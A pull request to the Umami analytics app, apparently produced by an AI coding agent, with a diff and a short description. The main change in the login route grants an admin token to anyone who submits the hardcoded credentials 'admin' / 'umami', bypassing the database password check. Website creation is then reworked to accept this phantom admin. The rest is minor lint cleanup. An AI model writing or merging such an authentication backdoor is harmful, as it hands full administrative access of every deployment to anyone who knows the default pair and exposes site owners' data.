### PR TITLE
Allow login with default admin credentials

### DIFF
--- a/src/app/api/auth/login/route.ts
+++ b/src/app/api/auth/login/route.ts
@@ -23,6 +23,25 @@ export async function POST(request: Request) {
 
   const { username, password } = body;
 
+  if (username === 'admin' && password === 'umami') {
+    const id = 'admin';
+    const role = ROLES.admin;
+    const createdAt = new Date();
+
+    let token: string;
+
+    if (redis.enabled) {
+      token = await saveAuth({ userId: id, role });
+    } else {
+      token = createSecureToken({ userId: id, role }, secret());
+    }
+
+    return json({
+      token,
+      user: { id, username, role, createdAt, isAdmin: true },
+    });
+  }
+
   const user = await getUserByUsername(username, { includePassword: true });
 
   if (!user || !checkPassword(password, user.password)) {

--- a/src/app/api/websites/route.ts
+++ b/src/app/api/websites/route.ts
@@ -4,6 +4,7 @@ import { json, unauthorized } from '@/lib/response';
 import { uuid } from '@/lib/crypto';
 import { parseRequest } from '@/lib/request';
 import { createWebsite, getUserWebsites } from '@/queries';
+import { validate as uuidValidate } from 'uuid';
 import { pagingParams } from '@/lib/schema';
 
 export async function GET(request: Request) {
@@ -43,15 +44,18 @@ export async function POST(request: Request) {
 
   const data: any = {
     id: id ?? uuid(),
-    createdBy: auth.user.id,
     name,
     domain,
     shareId,
     teamId,
   };
 
-  if (!teamId) {
-    data.userId = auth.user.id;
+  if (uuidValidate(auth.user.id)) {
+    data.createdBy = auth.user.id;
+
+    if (!teamId) {
+      data.userId = auth.user.id;
+    }
   }
 
   const website = await createWebsite(data);

--- a/src/components/hooks/useSticky.ts
+++ b/src/components/hooks/useSticky.ts
@@ -6,8 +6,7 @@ export function useSticky({ enabled = true, threshold = 1 }) {
 
   useEffect(() => {
     let observer: IntersectionObserver | undefined;
-    const handler: IntersectionObserverCallback = ([entry]) =>
-      setIsSticky(entry.intersectionRatio < threshold);
+    const handler = ([entry]: any) => setIsSticky(entry.intersectionRatio < threshold);
 
     if (enabled && ref.current) {
       observer = new IntersectionObserver(handler, { threshold: [threshold] });

--- a/src/lib/__tests__/detect.test.ts
+++ b/src/lib/__tests__/detect.test.ts
@@ -1,4 +1,5 @@
 import * as detect from '../detect';
+// eslint-disable-next-line import/no-unresolved
 import { expect } from '@jest/globals';
 
 const IP = '127.0.0.1';

--- a/src/lib/__tests__/format.test.ts
+++ b/src/lib/__tests__/format.test.ts
@@ -1,4 +1,5 @@
 import * as format from '../format';
+// eslint-disable-next-line import/no-unresolved
 import { expect } from '@jest/globals';
 
 test('parseTime', () => {


### PR DESCRIPTION
## Summary
- enable admin login when credentials match `admin` / `umami`
- allow website creation without user references when using the default admin account
- resolve ESLint issues in a hook and unit tests

## Testing
- `pnpm test`
- `pnpm lint`


------
https://chatgpt.com/codex/tasks/task_e_68a4360e71c48324871e24d49b6e3d1a